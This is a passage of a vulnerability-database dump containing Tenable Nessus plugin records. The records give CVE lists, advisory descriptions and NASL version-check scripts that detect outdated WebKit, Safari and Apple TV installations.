value:\"https://webkitgtk.org/security/WSA-2017-0006.html\"\n );\n # https://vuxml.freebsd.org/freebsd/0f66b901-715c-11e7-ad1f-bcaec565249c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?071f4a9f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.16.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:48", "description": "Versions of Safari prior to 10.1.1 are affected by multiple vulnerabilities :\n\n - A flaw exists that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.\n - A use-after-free error exists in the handling of RenderElement objects. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code.\n - A use-after-free error exists in the handling of RenderLayer objects. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code.\n - A use-after-free error exists in the handling of RenderInline objects. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code.\n - An unspecified flaw exists in the Safari history menu. With a specially crafted web page, a context-dependent attacker can cause an application denial of service.\n - A flaw exists related to an inconsistent user interface. This may allow a context-dependent attacker to spoof the address bar.\n - A logic flaw exists that allows a UXSS attack. The issue is triggered when handling container nodes. This may allow a context-dependent attacker to create a specially crafted web page that will execute arbitrary script code in a user's browser session within the trust relationship between their browser and any website.\n - A flaw exists related to an inconsistent user interface. This may allow a context-dependent attacker to spoof the address bar.\n\nThis product is also affected by vulnerabilities found in the following components:\n\n - WebKit \n - Web Inspector", "cvss3": {"score": 5.6, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2017-05-18T00:00:00", "type": "nessus", "title": "Safari < 10.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2499", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2515", "CVE-2017-2521", "CVE-2017-2525", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2549", "CVE-2017-6980", "CVE-2017-6984", "CVE-2017-2496", "CVE-2017-2510", "CVE-2017-2539", "CVE-2017-2538", "CVE-2017-2495", "CVE-2017-2500", "CVE-2017-2506", "CVE-2017-2508", "CVE-2017-2511", "CVE-2017-2514", "CVE-2017-2526", "CVE-2017-2528", "CVE-2017-2547"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700117.PRM", "href": "https://www.tenable.com/plugins/nnm/700117", "sourceData": "Binary data 700117.prm", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:09:36", "description": "According to its banner, the version of Apple TV on the remote device is prior to 10.2.1. It is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption issue exists in the WebKit Web Inspector component that allows an unauthenticated, remote attacker to execute arbitrary code.\n (CVE-2017-2499)\n\n - An unspecified race condition exists in the Kernel component that allows a local attacker to execute arbitrary code with kernel-level privileges.\n (CVE-2017-2501)\n\n - An information disclosure vulnerability exists in the CoreAudio component due to improper sanitization of certain input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2502)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit due to a logic flaw when handling WebKit Editor commands. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary script code in a user's browser session. (CVE-2017-2504)\n\n - Multiple memory corruption issues exist in WebKit due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to execute arbitrary code. (CVE-2017-2505, CVE-2017-2515, CVE-2017-2521, CVE-2017-2530, CVE-2017-2531, CVE-2017-6980, CVE-2017-6984)\n\n - Multiple information disclosure vulnerabilities exist in the Kernel component due to improper sanitization of certain input. A local attacker can exploit these to read the contents of restricted memory. (CVE-2017-2507, CVE-2017-6987)\n\n - A use-after-free error exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2017-2513)\n\n - Multiple buffer overflow conditions exist in the SQLite component due to the improper validation of certain input. An unauthenticated, remote attacker can exploit these, via a specially crafted SQL query, to execute arbitrary code. (CVE-2017-2518, CVE-2017-2520)\n\n - A memory corruption issue exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this, via a specially crafted query, to execute arbitrary code. (CVE-2017-2519)\n\n - An unspecified memory corruption issue exists in the TextInput component when parsing specially crafted data.\n An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2524)\n\n - A use-after-free error exists in WebKit when handling RenderLayer objects. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2525)\n\n - Multiple unspecified flaws exist in WebKit that allow an unauthenticated, remote attacker to corrupt memory and execute arbitrary code by using specially crafted web content. (CVE-2017-2536)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit due to a logic error when handling frame loading. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2549)\n\n - An unspecified flaw exists in the IOSurface component that allows a local attacker to corrupt memory and execute arbitrary code with kernel-level privileges.\n (CVE-2017-6979)\n\n - An unspecified flaw exists in the AVEVideoEncoder component that allows a local attacker, via a specially crafted application, to corrupt memory and execute arbitrary code with kernel-level privileges.\n (CVE-2017-6989)\n\n - A denial of service vulnerability exists in the CoreText component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to crash an application. (CVE-2017-7003)\n\n - A memory corruption issue exists in the JavaScriptCore component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-7005)\n\nNote that only 4th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "Apple TV < 10.2.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2499", "CVE-2017-2501", "CVE-2017-2502", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2507", "CVE-2017-2513", "CVE-2017-2515", "CVE-2017-2518", "CVE-2017-2519", "CVE-2017-2520", "CVE-2017-2521", "CVE-2017-2524", "CVE-2017-2525", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2549", "CVE-2017-6979", "CVE-2017-6980", "CVE-2017-6984", "CVE-2017-6987", "CVE-2017-6989", "CVE-2017-7003", "CVE-2017-7005"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_10_2_1.NASL", "href": "https://www.tenable.com/plugins/nessus/100256", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100256);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-2499\",\n \"CVE-2017-2501\",\n \"CVE-2017-2502\",\n \"CVE-2017-2504\",\n \"CVE-2017-2505\",\n \"CVE-2017-2507\",\n \"CVE-2017-2513\",\n \"CVE-2017-2515\",\n \"CVE-2017-2518\",\n \"CVE-2017-2519\",\n \"CVE-2017-2520\",\n \"CVE-2017-2521\",\n \"CVE-2017-2524\",\n \"CVE-2017-2525\",\n \"CVE-2017-2530\",\n \"CVE-2017-2531\",\n \"CVE-2017-2536\",\n \"CVE-2017-2549\",\n \"CVE-2017-6979\",\n \"CVE-2017-6980\",\n \"CVE-2017-6984\",\n \"CVE-2017-6987\",\n \"CVE-2017-6989\",\n \"CVE-2017-7003\",\n \"CVE-2017-7005\"\n );\n script_bugtraq_id(\n 98454,\n 98455,\n 98456,\n 98457,\n 98468,\n 98473\n );\n\n script_name(english:\"Apple TV < 10.2.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 10.2.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A memory corruption issue exists in the WebKit Web\n Inspector component that allows an unauthenticated,\n remote attacker to execute arbitrary code.\n (CVE-2017-2499)\n\n - An unspecified race condition exists in the Kernel\n component that allows a local attacker to execute\n arbitrary code with kernel-level privileges.\n (CVE-2017-2501)\n\n - An information disclosure vulnerability exists in the\n CoreAudio component due to improper sanitization of\n certain input. A local attacker can exploit this to read\n the contents of restricted memory. (CVE-2017-2502)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit due to a logic flaw when handling\n WebKit Editor commands. An unauthenticated, remote\n attacker can exploit this, via a specially crafted web\n page, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2504)\n\n - Multiple memory corruption issues exist in WebKit due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit these to\n execute arbitrary code. (CVE-2017-2505, CVE-2017-2515,\n CVE-2017-2521, CVE-2017-2530, CVE-2017-2531,\n CVE-2017-6980, CVE-2017-6984)\n\n - Multiple information disclosure vulnerabilities exist\n in the Kernel component due to improper sanitization of\n certain input. A local attacker can exploit these to\n read the contents of restricted memory. (CVE-2017-2507,\n CVE-2017-6987)\n\n - A use-after-free error exists in the SQLite component\n when handling SQL queries. An unauthenticated, remote\n attacker can exploit this to deference already freed\n memory, resulting in the execution of arbitrary code.\n (CVE-2017-2513)\n\n - Multiple buffer overflow conditions exist in the SQLite\n component due to the improper validation of certain\n input. An unauthenticated, remote attacker can exploit\n these, via a specially crafted SQL query, to execute\n arbitrary code. (CVE-2017-2518, CVE-2017-2520)\n\n - A memory corruption issue exists in the SQLite component\n when handling SQL queries. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n query, to execute arbitrary code. (CVE-2017-2519)\n\n - An unspecified memory corruption issue exists in the\n TextInput component when parsing specially crafted data.\n An unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-2524)\n\n - A use-after-free error exists in WebKit when handling\n RenderLayer objects. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2525)\n\n - Multiple unspecified flaws exist in WebKit that allow\n an unauthenticated, remote attacker to corrupt memory\n and execute arbitrary code by using specially crafted\n web content. (CVE-2017-2536)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit due to a logic error when handling\n frame loading. An unauthenticated, remote attacker can\n exploit this, via a specially crafted web page, to\n execute arbitrary code in a user's browser session.\n (CVE-2017-2549)\n\n - An unspecified flaw exists in the IOSurface component\n that allows a local attacker to corrupt memory and\n execute arbitrary code with kernel-level privileges.\n (CVE-2017-6979)\n\n - An unspecified flaw exists in the AVEVideoEncoder\n component that allows a local attacker, via a specially\n crafted application, to corrupt memory and execute\n arbitrary code with kernel-level privileges.\n (CVE-2017-6989)\n\n - A denial of service vulnerability exists in the\n CoreText component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this, via a specially crafted file, to crash\n an application. (CVE-2017-7003)\n\n - A memory corruption issue exists in the JavaScriptCore\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this, via specially crafted web content, to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-7005)\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207801\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10.2.1 or later. Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-6989\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14W585a\";\ntvos_ver = '10.2.1';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T13:34:53", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 10.1.1. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the history menu functionality. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n (CVE-2017-2495)\n\n - Multiple memory corruption issues exist in the WebKit component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these issues, by convincing a user to visit a specially crafted website, to execute arbitrary code.\n (CVE-2017-2496, CVE-2017-2505, CVE-2017-2506, CVE-2017-2514, CVE-2017-2515, CVE-2017-2521, CVE-2017-2525, CVE-2017-2526, CVE-2017-2530, CVE-2017-2531, CVE-2017-2538, CVE-2017-2539, CVE-2017-2544, CVE-2017-2547, CVE-2017-6980, CVE-2017-6984)\n\n - A memory corruption issue exists in the WebKit Web Inspector component that allows an unauthenticated, remote attacker to execute arbitrary code.\n (CVE-2017-2499)\n\n - An address bar spoofing vulnerability exists due to improper state management. An unauthenticated, remote attacker can exploit this to spoof the address in the address bar. (CVE-2017-2500, CVE-2017-2511)\n\n - Multiple universal cross-site scripting (XSS) vulnerabilities exist in WebKit due to improper handling of WebKit Editor commands, container nodes, pageshow events, frame loading, and cached frames. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary script code in a user's browser session. (CVE-2017-2504, CVE-2017-2508, CVE-2017-2510, CVE-2017-2528, CVE-2017-2549)\n\n - Multiple unspecified flaws exist in WebKit that allow an unauthenticated, remote attacker to corrupt memory and execute arbitrary code by using specially crafted web content. (CVE-2017-2536)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-05-23T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 10.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2495", "CVE-2017-2496", "CVE-2017-2499", "CVE-2017-2500", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2506", "CVE-2017-2508", "CVE-2017-2510", "CVE-2017-2511", "CVE-2017-2514", "CVE-2017-2515", "CVE-2017-2521", "CVE-2017-2525", "CVE-2017-2526", "CVE-2017-2528", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2538", "CVE-2017-2539", "CVE-2017-2544", "CVE-2017-2547", "CVE-2017-2549", "CVE-2017-6980", "CVE-2017-6984"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI10_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/100355", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100355);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-2495\",\n \"CVE-2017-2496\",\n \"CVE-2017-2499\",\n \"CVE-2017-2500\",\n \"CVE-2017-2504\",\n \"CVE-2017-2505\",\n \"CVE-2017-2506\",\n \"CVE-2017-2508\",\n \"CVE-2017-2510\",\n \"CVE-2017-2511\",\n \"CVE-2017-2514\",\n \"CVE-2017-2515\",\n \"CVE-2017-2521\",\n \"CVE-2017-2525\",\n \"CVE-2017-2526\",\n \"CVE-2017-2528\",\n \"CVE-2017-2530\",\n \"CVE-2017-2531\",\n \"CVE-2017-2536\",\n \"CVE-2017-2538\",\n \"CVE-2017-2539\",\n \"CVE-2017-2544\",\n \"CVE-2017-2547\",\n \"CVE-2017-2549\",\n \"CVE-2017-6980\",\n \"CVE-2017-6984\"\n );\n script_bugtraq_id(\n 98454,\n 98455,\n 98456,\n 98470,\n 98473,\n 98474\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-05-15-7\");\n\n script_name(english:\"macOS : Apple Safari < 10.1.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 10.1.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified flaw exists in the history menu\n functionality. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n (CVE-2017-2495)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n these issues, by convincing a user to visit a specially\n crafted website, to execute arbitrary code.\n (CVE-2017-2496, CVE-2017-2505, CVE-2017-2506,\n CVE-2017-2514, CVE-2017-2515, CVE-2017-2521,\n CVE-2017-2525, CVE-2017-2526, CVE-2017-2530,\n CVE-2017-2531, CVE-2017-2538, CVE-2017-2539,\n CVE-2017-2544, CVE-2017-2547, CVE-2017-6980,\n CVE-2017-6984)\n\n - A memory corruption issue exists in the WebKit Web\n Inspector component that allows an unauthenticated,\n remote attacker to execute arbitrary code.\n (CVE-2017-2499)\n\n - An address bar spoofing vulnerability exists due to\n improper state management. An unauthenticated, remote\n attacker can exploit this to spoof the address in the\n address bar. (CVE-2017-2500, CVE-2017-2511)\n\n - Multiple universal cross-site scripting (XSS)\n vulnerabilities exist in WebKit due to improper handling\n of WebKit Editor commands, container nodes, pageshow\n events, frame loading, and cached frames. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to execute arbitrary script\n code in a user's browser session. (CVE-2017-2504,\n CVE-2017-2508, CVE-2017-2510, CVE-2017-2528,\n CVE-2017-2549)\n\n - Multiple unspecified flaws exist in WebKit that allow\n an unauthenticated, remote attacker to corrupt memory\n and execute arbitrary code by using specially crafted\n web content. (CVE-2017-2536)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207804\");\n # https://lists.apple.com/archives/security-announce/2017/May/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7a320df7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-6984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!ereg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"10.1.1\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report, xss:true);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:45", "description": "According to its banner, the version of Apple TV on the remote device is prior to 11.3. It is, therefore, affected by multiple vulnerabilities as described in the HT208698 security advisory.\n\nNote that only 4th and 5th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-16T00:00:00", "type": "nessus", "title": "Apple TV < 11.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4104", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4115", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4142", "CVE-2018-4143", "CVE-2018-4144", "CVE-2018-4146", "CVE-2018-4150", "CVE-2018-4155", "CVE-2018-4157", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4166", "CVE-2018-4167"], "modified": "2019-04-05T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_3.NASL", "href": "https://www.tenable.com/plugins/nessus/109060", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109060);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4104\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n \"CVE-2018-4115\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4142\",\n \"CVE-2018-4143\",\n \"CVE-2018-4144\",\n \"CVE-2018-4146\",\n \"CVE-2018-4150\",\n \"CVE-2018-4155\",\n \"CVE-2018-4157\",\n \"CVE-2018-4161\",\n \"CVE-2018-4162\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\",\n \"CVE-2018-4166\",\n \"CVE-2018-4167\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-3-29-3\");\n\n script_name(english:\"Apple TV < 11.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.3. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208698 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208698\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.3 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4143\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 